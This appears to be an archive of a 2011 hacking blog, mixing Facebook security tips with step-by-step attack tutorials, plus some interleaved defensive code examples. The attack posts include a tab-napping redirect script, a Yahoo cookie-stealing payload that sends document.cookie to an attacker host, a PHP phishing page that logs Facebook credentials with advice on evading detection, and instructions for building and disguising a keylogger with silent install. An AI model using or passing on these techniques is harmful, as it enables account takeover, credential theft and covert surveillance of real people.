Showing posts with label Account Hacking. Show all posts

HOW TO SETUP A TAB-NAPPING SCRIPT


Tab napping is a type of phishing scam that does not require the victim to click on any URL in order to be redirected to a phishing site. Instead it relies on the fact that a lot of people use tabbed browsing (opening multiple tabs while browsing). In a tab napping scam, one of your inactive tabs is automatically replaced with a new tab without your knowledge.
To know more about tab Napping, you can check my earlier article here

How to setup a Tab Napping Script
1. Create an Ordinary phisher

  • First of all, you need to prepare a normal traditional phisher. In this tutorial, I will assume that you already know how to create a phishing page. If you don't know how, then go through my earlier tutorial on how to make a phisher .

2. Install the Script
  • Download the Tab Napping script here
  • Open the text file containing the script with a text editor like Notepad and search for the lines below;
timerPoll = setInterval("pollActivity()",1); //poll scrolling
timerRedirect =setInterval("location.href='http://username.site.com/fakepage.htm'",10000);


  • Now in the above script, replace http://username.site.com/fakepage.htm with your phishing url


Note that 10000 is the default time, in milliseconds, that it will take before the victim's idle tab automatically redirects to your phishing page. Therefore you can modify the idle time too.


10000 milliseconds = 10 seconds
  • After you have edited the script, copy and paste it into the HTML of your site or blogger site
That's it! Your trap is set man!!! :xD

TIPS ON HOW TO SECURE YOUR FACEBOOK ACCOUNT

Getting hacked is one of the worst nightmares one can ever have (at least I have never been through one :P), especially when your Facebook account acts as a login key to third party web accounts. It means ''multiple accounts compromised''. And not only that, the hacker might have a personal deed and may decide to pull a prank on your friends or even worse. I personally know how easy it is to hack into any web account, Facebook inclusive, and on the other hand, I also know how easy it can be to protect yourself :D
Below are a few TIPS to help you secure your facebook account.
1.  Enable secure HTTPS connection
HTTP connection is totally outdated. It can easily be tapped or intercepted by a hacker and is extremely vulnerable to attack. As a result, Facebook now offers the HTTPS connection to ensure that all the data submitted from your computer to the Facebook server is completely encrypted. That way, even if there is somebody (a hacker) in the middle who taps your connection, all that person gets is gibberish data that he can't even understand. You can enable HTTPS from your Facebook account settings.
2. Create a strong password for authentication
No matter how secret your password is, it can easily be broken by brute force if you choose to use a short and simple password. If you don't have a strong password to protect your account, then whatever security guides you apply won't do you any good. The key here is to have a long and complicated password, where complexity is the combination of lower case, upper case, numeric and special characters like symbols. For example:

2$k/Gp@?H$y8rQ?
A hacker would easily give up on such a password as it would take him ages to brute-force. So there you have it.
  • DO NOT use a password that has a straight forward meaning (that can be found in the dictionary)
  • DO NOT use a phone number as a password
  • DO NOT use your boyfriend's or girlfriend's name as a password, no matter how much you love them, or else it'll easily be broken down. :P

    3. Enable login notification
    Enabling the login notification will keep you notified when somebody logs in to your account without your permission, so you can immediately kick them out and set a new password so that they can never log in again. This is an extremely good feature which can be enabled for both email and mobile SMS.
    4. One Time Password in login approval
    One Time Password is a two-factor authentication method where you can require all logins from unknown devices to use a One Time Password, so as to ensure that only you can log in from an unknown device. By making use of this feature, there is only one way a hacker can get your Facebook identity, which is by stealing your recognised device, that is, your computer or mobile phone lol.

    5. Logging out from Facebook
    Logging out from Facebook is the easiest way of securing your account, but it is the action that most people forget to perform. Whenever most people are done with checking and replying to messages in Facebook, they just close the web browser and walk away from the computer, assuming that the session is logged out. Unfortunately, that is a big gamble and not all web browsers work the same. Some still retain your previous session even though the web browser is closed. Remember to log out.
    6. Beware of Keyloggers
    A keylogger is a spyware tool that runs secretly in the system and records each and every keystroke on the user's keyboard. In other words, whatever you type on the keyboard is going to be saved as logs, which can later be viewed with a log viewer or sent to the hacker's email address via your network. Besides keystroke capturing, keyloggers have additional features like screenshot capturing, secret webcam capture and web activity logging. There are two types of keyloggers: software and hardware keyloggers.
    • Software keyloggers are usually downloaded as file attachments from the web; a single click on that file executes the keylogger.
    • Hardware keyloggers are more like USB disks; they are plugged in manually onto the victim's computer via a USB port. The most common places to find hardware keyloggers are Internet cafes (cyber cafes).
    How to Avoid and Bypass keyloggers
    • Update your antivirus regularly, though this will only apply to software keyloggers, as hardware keyloggers are hardly detected by antivirus :P
    • Develop a habit of using an onscreen keyboard whenever you want to enter a password; this will bypass any keylogger installed on your system. To access the onscreen keyboard, simply go to Start->Run, then in the prompt box type osk.exe and hit Enter. The keyboard will appear on your screen; then use the mouse to enter your password.
    • Another way to bypass a keylogger is to fool it by shuffling your password when entering it lol. What I mean is, for example, if your password is ABCDEF, when entering it, first type the letters ''AB'' and ''F'', then put the mouse cursor between ''B'' and ''F'' and type the letters ''C'' and ''E'', then finally put your mouse cursor between ''C'' and ''E'' and punch the letter D. ... haha lol, then whoever installed that keylogger will never get your password correct. The aim is to enter the password without following the correct order.
    7. Beware of Phishing
    Phishing is a method of getting a user's credentials, i.e. username and password, with the help of a fake login page. You can find out more about phishing in my earlier article here. To protect yourself from phishing, always check the URL or current page address in your browser's address bar to make sure you are on the real login page. And please NEVER submit your login details on any third party site apart from Facebook. Stay alert!!

    8. Beware of HACK the hacker tools
    These are simple tools that are developed with a quite convincing interface that promises to hack anybody's password with a single click, e.g. facebook hacker pro, 007 facebook hacker, gmail password cracker, yahoo password cracker etc. These contain two main parts, the noob hacker's part and the victim's part. The noob hacker is prompted to enter his username & password followed by his victim's username, with the belief that when the noob hacker hits Enter, he will get his victim's password revealed. Well, the bad news is that these tools are nothing but trojans.

    What this tool will do instead is get whatever was typed in the noob hacker's part (username and password) & send it silently to the real HACKER's email address via a network connection, hence the noob hacker has been HACKED!!! :P:P:P

    Therefore if you have been searching for software on the internet to hack your friend with, I suggest that you stop now or you will only get yourself hacked. For now it is impossible to hack into Facebook or any other account with a single click; the only way is by doing the manual work yourself.
    9. Update your System Regularly
    Updating your system regularly is one of the effective ways to get rid of malicious tools or spyware programs that may have patched up your system. Remember, there is nothing like 100% secure, change your passwords like a ladies underwear. Update your antivirus and do a regular scan. But please do not trust your antivirus too much lol. Some of these tools are deadly and completely FUD (Fully Undetectable). Just combine with the above knowledge and you are safe :D:D:D
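Tip 7's advice to check the address bar comes down to comparing the host name, not the page name or how the page looks. The following is an added example, not code from the original post: the function names are assumptions, and the sample URLs are constructed from hosts mentioned on this page.

```javascript
// Added example: decide whether a URL really belongs to the site you expect.
// Only the scheme and the host name are trusted; the path is ignored, because
// a page called "facebook.html" can live on any host.
function checkLoginUrl(urlString, expectedDomain) {
  let url;
  try {
    url = new URL(urlString); // throws on anything that is not an absolute URL
  } catch {
    return { ok: false, reason: 'not a valid absolute URL' };
  }
  if (url.protocol !== 'https:') {
    return { ok: false, reason: 'not HTTPS' };
  }
  if (url.username || url.password) {
    return { ok: false, reason: 'credentials embedded before the host' };
  }
  // Normalise: lower case, drop a trailing dot.
  const host = url.hostname.toLowerCase().replace(/\.$/, '');
  if (host.split('.').some((label) => label.startsWith('xn--'))) {
    return { ok: false, reason: 'host contains a punycode label' };
  }
  // Accept the domain itself or a true subdomain of it, nothing else.
  if (host !== expectedDomain && !host.endsWith('.' + expectedDomain)) {
    return { ok: false, reason: `host ${host} is not under ${expectedDomain}` };
  }
  return { ok: true, reason: 'host matches' };
}

// Constructed sample inputs, built from hosts that appear on this page.
const SAMPLE_URLS = [
  'https://www.facebook.com/login.php',
  'http://www.facebook.com/login.php',
  'https://www.yourusername.my3gb.com/facebook.html',
  'https://www.anyname.tk/',
  'www.anyname.tk',
  'https://m.facebook.com/',
];

function auditSamples() {
  return SAMPLE_URLS.map((u) => ({ url: u, ...checkLoginUrl(u, 'facebook.com') }));
}

for (const row of auditSamples()) {
  console.log(row.ok ? 'OK    ' : 'REJECT', row.url, '-', row.reason);
}
```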


    HOW TO HACK YAHOO ACCOUNT via SESSION COOKIES | SESSION ID's | STEALING YOUR VICTIM's COOKIES

    What are Session ID's or Session Cookies??
    A session ID is a unique string that is generated when a user signs into any account. One copy is stored on the server and the other copy is saved in the user's browser as a cookie. Both copies are matched every time a user does anything in his or her account. These session IDs are destroyed immediately when the user clicks on the ''sign out'' button.
    To view your session cookies, Just login to yahoo.com. Type in browser; 

     javascript:alert(document.cookie);

    You will get a pop up box showing you the cookies. Now login to your account and do same thing, you would see more elements added to the cookies. These represent sessions ids .



    These are the same piece of strings that an attacker (Hacker) can attempt to steal by tricking his victim into running a piece of code on his browser (Victim's browser). Once an attacker gains access to the victim's cookies, he will be able to automatically login to the victim's account without the need to provide a username and password, hence a hacked session.. :P:P:P

    This is a very rare type of a cyber attack because when the victim clicks on the ''sign out'' button, the cookie gets destroyed and hence the attacker gets signed out.

    In the case of Yahoo, the hacker doesn't get signed out even when the user clicks the ''sign out'' button. Instead Yahoo destroys the session automatically after at least 24 hours. But when the user refreshes the window in the Yahoo account, he gets a session for the next 24 hours. This means that an attacker can do the same by refreshing the window every 24 hours, thereby getting access to the victim's account for a lifetime :D
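The weakness described above is a session whose server copy survives sign-out and can be renewed indefinitely. The following is an added example, not code from the original post or from Yahoo: a server-side session store that deletes the session on sign-out, caps its total lifetime, and issues the cookie with HttpOnly so that document.cookie does not expose it. The class name, the cookie name `sid` and both timeout values are assumptions.

```javascript
// Added example: server-side session lifecycle. SessionStore, the cookie
// name "sid" and both timeout values are assumptions, not Yahoo's design.

// Web Crypto CSPRNG: global in current Node, loaded from the crypto module
// on older Node versions.
const cryptoApi = globalThis.crypto ?? require('crypto').webcrypto;

const IDLE_MS = 30 * 60 * 1000;          // expire after 30 minutes without use
const ABSOLUTE_MS = 24 * 60 * 60 * 1000; // hard cap that activity cannot extend

function newSessionId() {
  const bytes = cryptoApi.getRandomValues(new Uint8Array(32)); // 256 bits
  return Array.from(bytes, (b) => b.toString(16).padStart(2, '0')).join('');
}

class SessionStore {
  constructor(now = () => Date.now()) {
    this.now = now;            // injectable clock so expiry can be tested
    this.sessions = new Map(); // sid -> { user, createdAt, lastSeen }
  }

  create(user) {
    const sid = newSessionId();
    const t = this.now();
    this.sessions.set(sid, { user, createdAt: t, lastSeen: t });
    return sid;
  }

  // Returns the user for a live session, otherwise null.
  validate(sid) {
    const s = this.sessions.get(sid);
    if (!s) return null;
    const t = this.now();
    if (t - s.createdAt > ABSOLUTE_MS || t - s.lastSeen > IDLE_MS) {
      this.sessions.delete(sid);
      return null;
    }
    s.lastSeen = t;
    return s.user;
  }

  // Sign-out deletes the server copy, so any copied cookie stops matching.
  destroy(sid) {
    return this.sessions.delete(sid);
  }
}

// HttpOnly keeps the value out of document.cookie, Secure keeps it off
// plain HTTP, SameSite=Lax limits cross-site sending.
function sessionCookie(sid) {
  return `sid=${sid}; Path=/; Max-Age=${ABSOLUTE_MS / 1000}; HttpOnly; Secure; SameSite=Lax`;
}

function demo() {
  let clock = 0; // constructed clock, in milliseconds
  const store = new SessionStore(() => clock);

  // Case 1: a copy of the cookie value is useless once the owner signs out.
  const sid = store.create('alice');
  const copied = sid;
  const beforeLogout = store.validate(copied);
  store.destroy(sid);
  const afterLogout = store.validate(copied);

  // Case 2: refreshing every 20 minutes satisfies the idle timer, but the
  // absolute cap still ends the session shortly after 24 hours.
  const sid2 = store.create('alice');
  let refreshes = 0;
  while (store.validate(sid2) !== null) {
    refreshes += 1;
    clock += 20 * 60 * 1000;
  }
  return { beforeLogout, afterLogout, refreshes, expiredAtMs: clock };
}

console.log(demo());
console.log(sessionCookie('<session id>'));
```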

    HOW TO STEAL SESSION ID's
    1. Download the cookie stealer here
    2. Sign up for a free account at any php enabled webhosting site. I advise you to choose www.my3gb.com
    3. Login to your my3gb file manager and upload the four files  that you have just downloaded. Then Create an empty directory and rename it as ''cookies'' as shown in the image below;


    • Yahoo.php is basically cookie stealing script, hacked.php executes the stolen cookies in browser. and the Stolen cookies get stored in directory ''cookies''
    4. Now give the code below to your victim to run in his browser when he is logged in to his yahoo account.

    javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie)); 

    Trick your victim into entering and running the above code into his browser. How you will trick your victim will totally depend on your creativity.

    5. After you are sure that your victim has run the code in his browser, go to your my3gb file manager and open ''hacked.php''. The password is explore

    6. Enter the password explore and click ''login'', then you will find the Username to the yahoo account of the hacked session... as shown below;

    7. Click on the Username and its game Over!!!,.. it will take you straight into the victim's email account without asking for the password. :D:D:D
    • It doesn't matter if victim signs out from his account, you would remain logged into it.

    Note: You can try this attack by using two browsers. Sign into yahoo account in one browser and run the code. Then sign in through other browser using stolen session. Also note that the script will not work in latest versions of google chrome.

    Enjoy.:D

    HOW TO MAKE A PHISHER | HACK FACEBOOK, GMAIL e.tc | TUTORIAL

    WHAT IS PHISHING?
    Phishing is a technique or a way of attempting to acquire sensitive or confidential information such as usernames, passwords, and credit card details by false pretence as a trustworthy entity in an electronic communication. This is done with the help of a phisher.


    WHAT IS A PHISHER?
    A phisher is something that looks exactly like an Original login page (fake page), that writes the victim's login data (Username and Password) to a specific file, or does whatever you want so long as you get access to the victim's login data.
    Here is an example of a fake facebook login page (phisher)

    HOW TO MAKE A PHISHER?
    As the saying goes:
    • Dont give plenty of FISH to your friend,. Instead, you should teach him how to PHISH
    Therefore, instead of  just giving you the download link to the already made phishing page,.. Am going to teach you how to make your own phishing page. Well, at the end of this tutorial, i will put a download link to my already made phishing pages but first you have to learn how to make your own phisher :D

    To create a successful phisher, all you need is a PHP enabled site, Notepad on your computer and a brain.
    You can download Notepad v5.9++ here

    Here is a list of php enabled free hosting sites:

    In this tutorial I am going to focus mainly on how to prepare a phishing attack on Facebook. I am going to use Mozilla Firefox as the browser and http://my3gb.com as the hosting site; it's much easier.

    STEP 1 -Creating the fake page
    • Go to facebook's login page http://www.facebook.com
    • On the top left corner of your Firefox browser, Click File ->Save page As and save your page name as facebook.html
    • Open facebook.html Using Notepad and search for the word ''action''
    You will find it on a line that looks like this;

    class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form"

    • Now change the method to ''get'' and action to ''login.php'' so that you will have something that looks like this;
    class="menu_login_container"><form method="get" action="login.php" id="login_form"
     STEP 2- Preparing the php script
    • To create a php file, simply paste the code below into your notepad. Then save it as login.php

    ------------------------------------------------------------------------------
    <?php
    header("Location: http://facebook.com/login.php ");
    $handle = fopen("noobs.txt", "a");
    foreach($_GET as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>


    ------------------------------------------------------------------------------

     Note that in the above script, ''phished.txt'' is the file on which all hacked usernames and passwords will be saved and ''https://facebook.com/login.php'' is the original Facebook URL where your victim will be redirected to after clicking the login button on your fake page. But at the moment Facebook has tightened its security, whereby your victim will get notified of a phishing attack and would therefore be prompted to change his password right after arriving from a phishing page.

    To avoid this, you should redirect your victim to any other url which is not of facebook by replacing  https://facebook.com/login.php with any url. Choosing the url to redirect your victim to will all depend on the trick that you will use against your victim in the whole phishing process.

    Please also note that this part is mainly for facebook , its ok with several other sites like gmail, hotmail e.t.c your victim will not get a warning message, including mobile facebook (http://m.facebook.com).

    STEP 3- Create File where to save hacked passwords
    • Create an empty text file using notepad and rename it as phished
    Note that when creating the text file, there is no need of renaming it as phished.txt because the fact that you will save it as a text file is enough to make it bear the extension of txt

    Now you have 3 files so far;
    1. facebook.html
    2. login.php
    3. phished.txt
     STEP 5- Uploading the 3 files

    Now go to http://my3gb.com and sign up for a free hosting account the upload the 3 files as shown below


    If your phisher has successfully been made, any email address and passwords that are typed on your fake page will be saved on the ''phished.txt'' file as shown in the image below

    The link to your phishing page will therefore be; 
    www.yourusername.my3gb.com/facebook.html

    NOTE THAT:
    1. No One will be so dumb to click on such a link
    2. Facebook will automaticaly block your phishing url from being posted on facebook
    To overcome the above situation you need to rename your phishing link using a ''dot.tk'' domain. To be able to do this, go to www.dot.tk and register. After that, login to your account and click on ''Add a new free domain now'' and follow the rest of the steps.

    Your dot.tk domain name will look like this: www.anyname.tk. Any clicks on this link will be forwarded to your fake facebook page.
    The good part is that..
    • you can rename the phishing link to suit your victim's curiosity, thereby making it difficult for him to notice any phisher
    • Your phisher will NOT be detected and blocked by facebook, so you are free to post it or send it to a friend on facebook via inbox.
    Hope you enjoyed the tutorial,. you can now Download some of the already made phishing pages.

    FUNNY TRICK TO HACK FACEBOOK

    You can actually impress someone with your hacking skills by using this trick of hacking Facebook. The funny part is that this trick will not actually hack into Facebook or do any privacy violation to your victim's account. This is just a simple JavaScript trick, but the other person witnessing it will surely believe you are a hacker. What you have to do is run this JavaScript in the address bar of your web browser.

    • Copy and paste the JavaScript into the address bar
    javascript:document.body.contentEditable='true'; document.designMode='on'; void 0



    With this script, you can edit the content of any webpage including Facebook, Twitter, Gmail etc. For example, see the pic below.

    HOW THIS TRICK WORKS?
    This is JavaScript code running on the browser side. It is temporary and the changes will be gone once you refresh the webpage.
    The code javascript:document.body.contentEditable='true'; makes the website editable in your browser.
    The code document.designMode='on' tells the browser to turn design mode on.
    The code void 0 tells the browser not to show any error.
    So, enjoy this funny trick to hack Facebook.
    NOTE: The JavaScript code doesn't work in the latest version of the Google Chrome browser .. :P


    HOW TO DISABLE FACEBOOK PHOTO THEATRE MODE


    Some Facebook users are not happy with the new feature called ‘Theater Mode’, it displays a black box around the photo which prevents users from interacting with the rest of the site.
    You can simply open the photo in new tab or remove the “&theater” text from the end of the URL to get rid of the Facebook theater mode; another trick is that you can refresh the page to get back the default photo viewer.

    If you want to disable the theater mode permanently, here are the step by step instructions:

    1. Solution for ‘Chrome’ users:

    If you’re using Facebook in your Chrome browser then go to :
    http://userscripts.org/scripts/show/96773  and there click on install to install the ‘Facebook Photo Theater Killer’
    A pop-up will ask you to start the installation, just click the ‘Install’ button. (Don’t worry it is safe)

    That’s it ! Now whenever you open photos in Facebook, it will show you all your photos in a normal photo viewer.

    2. Solution for ‘Firefox’ users:

    If you’re using Facebook on your Firefox browser then you need to install ‘Greasemonkey’ Add-on.

    Install Greasemonkey: https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/

    Now go to : http://userscripts.org/scripts/show/96773  & click the ‘Install’ button to install the ‘Facebook Photo Theater Killer’ script.

    That’s it ! Now whenever you open photos in Facebook, it will show you all your photos in a normal photo viewer.

    How to uninstall the script ?
    If you want to uninstall the ‘Facebook Photo Theater Killer’ script from Chrome, simply go to ‘Tools’ & select ‘Extensions’, where you can disable or uninstall the script easily. You can also uninstall this script from the Mozilla Firefox browser. Simply go to ‘Tools’ & select ‘Add-ons’, then go to the ‘User Script’ tab & there you can easily disable or uninstall the script.
    • If you want to uninstall the Greasemonkey add-on as well then go to ‘Extensions’ tab where you can disable or uninstall the add-on easily.
    Enjoy!!!...


    HOW TO HACK FACEBOOK | GMAIL ... etc USING RAPZO KEYLOGGER

     Just like any other keylogger, Rapzo logger is a keystroke recorder that captures the user's activity and saves it to an encrypted log file which can be viewed remotely via email. To hack using this tool, follow the following steps:
    1. Download Rapzo Keylogger
    2. Make sure that you have Microsoft .NET Framework installed on your computer.
    3. Extract the Rapzo keylogger archive and run RapZo logger.exe
    4. In the Mail setup tab, check on Enable to highlight the mail setup options as shown below
    5. Enter your email address where it says ''Enter Username'' and your password where it says ''Enter Password''... Take it easy, you won't get hacked. If you want to be very sure, you can create another account just for hacking purpose at gmail.com.
    6. Then enter the same email address on ''Logs send To'' and click on Test Me to verify if your email address is working & that your logs can go through.
    7. Now click on the Options tab on top and check on your desired options as shown below:

    • I recommend that you should NOT check on fake error as this may alert your victim. The habit of creating fake errors has been famously known, so I personally don't advise people to do that. Instead just drop a silent install on your victim.
    8. After that, go back to the Mail Setup tab, and click on Build to create the ''server.exe'' file and send it to your victim.

    NOTE THAT
    Whenever you want to hack remotely with keyloggers, RATs, or other spyware programs, please avoid sending out server files with names like server.exe, install.exe, etc. Nowadays noobs are smart, most of them know exactly what kind of actions these files perform. Instead you should always try to rename your server file with something similar to a system file name like explore.exe, taskmngr.exe, taskhost.exe, then bind it to any file. This way, your victim will have a hard time identifying the server file once it gets installed onto his computer.


    HOW TO PREVENT FACEBOOK HACKING

     Facebook is a social website that gives people the power to share and make the world more open and connected. For its growing popularity, hackers have turned their attention to Facebook and its applications. It is very important for all Facebook account holders to know some tricks to prevent hacking.


    •  Strong Password

    The first and foremost trick to prevent hacking is to make a strong password. You can make a strong password by using both uppercase and lowercase letters as well as numbers and symbols. Make sure to compose a new password with 8 letters at least. Never include your personal information like name, date of birth or home address. Change your password once a month.

    • Protect Your Computer from Virus and Spyware

    Do so to protect the personal information stored on your computer. Spyware and viruses can steal your confidential information like passwords, bank information and important documents by sending them to hackers. If you use a café computer or a friend's computer, make sure to log out properly and never choose the Remember Me option. Many keyloggers and RATs (Remote Administration Tools) have become quite widespread, therefore it is also a must to have a good antivirus like "Avira".

    • Tweak Privacy Settings

    A lot of work is being done to make Facebook safer, but there are still many chances of account hacking. You can prevent hacking by controlling the information visible to the public. The more information you allow people to see, the greater the chances of hacking. Don’t post your picture in your profile, as hackers can save the image and post it somewhere else. Don’t put your pictures on the internet, as it makes people curious to see them.

    • Be Careful While Playing Applications

    Don’t be crazy over different Facebook applications. It can be really addictive if your other friends are also playing the same applications. By installing these applications, you allow the creators of these applications to access your computer. You are advised to make a spare account on Facebook to enjoy its applications and protect your personal information from hacking.

    • Use Mozilla Firefox/Chrome Web Browser

    Firefox claims to stop spyware from entering your computer, so switch to this web browser from your old one. Chrome, being a little newer to the web industry, has fewer vulnerabilities, and its simplicity has always been the key to its protection. I would definitely recommend Chrome for personal use.



    TAB NAPPING


    An insecurity expert on Mozilla's Firefox web browser team has warned about a form of advanced phishing attack also known as 'tab napping'.
    •  WHAT IS TAB NAPPING?
      Unlike traditional phishing, which relies on getting users to click through on a URL that redirects to the phishing site and reveal their user credentials, tab napping relies on the fact that most people use tabbed browsing (opening multiple tabs while browsing).
    • HOW DOES TAB NAPPING WORK?
    During a tab napping attack, one of the inactive tabs is replaced by a phishing page without the user's knowledge. For example, one of your inactive tabs in which you have opened your Facebook account will be automatically replaced with a phishing login page that looks exactly like that of Facebook, and you will be asked to enter your username and password. Once these details are entered, they will be sent to the hacker and you will be redirected to the original Facebook.
    •  HOW TO PREVENT THIS ATTACK?
    Tab napping always takes advantage of the user's assumption that a tabbed web page stays the same when other Internet services are being accessed. Therefore, to protect yourself from this type of attack, you always have to:
    1. Log out & close the tab when it is no longer in use
    2. Always check the URL when returning from another tab; make sure it is on a secure connection (https://site.com)
    3. Close & open a new tab if you notice anything unusual about the URL
    4. Break the habit of opening multiple tabs unnecessarily when browsing the web
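The tab napping script described earlier on this page works by placing a page navigation inside a timer. The following is an added example, not part of the original post: it scans a page's inline scripts for that pattern so a site owner can audit HTML pasted into a template or widget. The function names are assumptions and the sample page is constructed, reusing the placeholder URL from the tutorial.

```javascript
// Added example: flag timer callbacks that navigate the page.
const TIMER_CALL = /\b(setInterval|setTimeout)\s*\(/g;
// Assignment to location / location.href, or location.replace()/assign().
const NAVIGATION =
  /\b(?:(?:window|document|top|self)\.)?location(?:\.href)?\s*=(?!=)|\blocation\.(?:replace|assign)\s*\(/;

// src[open] is "("; returns the text up to its matching ")" or null.
// Quoted strings are skipped so brackets inside them are not counted.
function readCallArgs(src, open) {
  let depth = 0;
  let quote = null;
  for (let i = open; i < src.length; i++) {
    const c = src[i];
    if (quote) {
      if (c === '\\') i++;
      else if (c === quote) quote = null;
    } else if (c === '"' || c === "'" || c === '`') {
      quote = c;
    } else if (c === '(') {
      depth++;
    } else if (c === ')' && --depth === 0) {
      return src.slice(open + 1, i);
    }
  }
  return null;
}

function hostOf(url) {
  try { return new URL(url).hostname; } catch { return null; }
}

// pageHost is the host the audited page is served from.
function findTimedRedirects(html, pageHost) {
  const findings = [];
  const scripts = html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script\s*>/gi);
  for (const [, body] of scripts) {
    for (const m of body.matchAll(TIMER_CALL)) {
      const args = readCallArgs(body, m.index + m[0].length - 1);
      if (args === null || !NAVIGATION.test(args)) continue;
      const delay = /,\s*(\d+)\s*$/.exec(args);
      const url = /https?:\/\/[^\s'"\\)]+/.exec(args);
      findings.push({
        timer: m[1],
        delayMs: delay ? Number(delay[1]) : null,
        target: url ? url[0] : null,
        // Code passed as a string is evaluated later, like eval().
        stringCallback: /^\s*["'`]/.test(args),
        offSite: url ? hostOf(url[0]) !== pageHost : null,
      });
    }
  }
  return findings;
}

// Constructed sample page: the two lines quoted in the tutorial, plus two
// ordinary timers (a clock and a same-site "session expired" redirect).
const SAMPLE_PAGE = `
<html><body>
<script>
timerPoll = setInterval("pollActivity()",1); //poll scrolling
timerRedirect =setInterval("location.href='http://username.site.com/fakepage.htm'",10000);
</script>
<script>
setInterval(function () { document.title = new Date().toLocaleTimeString(); }, 1000);
setTimeout(() => { window.location.replace("https://example.org/session-expired"); }, 900000);
</script>
</body></html>`;

console.log(findTimedRedirects(SAMPLE_PAGE, 'example.org'));
```

A same-site redirect after a long delay is usually benign; a string callback that sends the tab to another host after a few seconds is the combination worth reviewing.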

    HOW TO POST EMPTY STATUS ON FACEBOOK

    It is rather weird but a fact that you can now post an empty status on Facebook by simply using any of the following methods.


    Method 1
    As you are logged in to your facebook account ;
    • Go to the update status field
    • Hold the Alt key and type 0173
    • Release the Alt key and post.
    Method 2
    • Go to update status field
    • Type @[2:2: ]
    • Then post it

     
    Copyright © 2011. Ethical Hacking Unleashed . All Rights Reserved.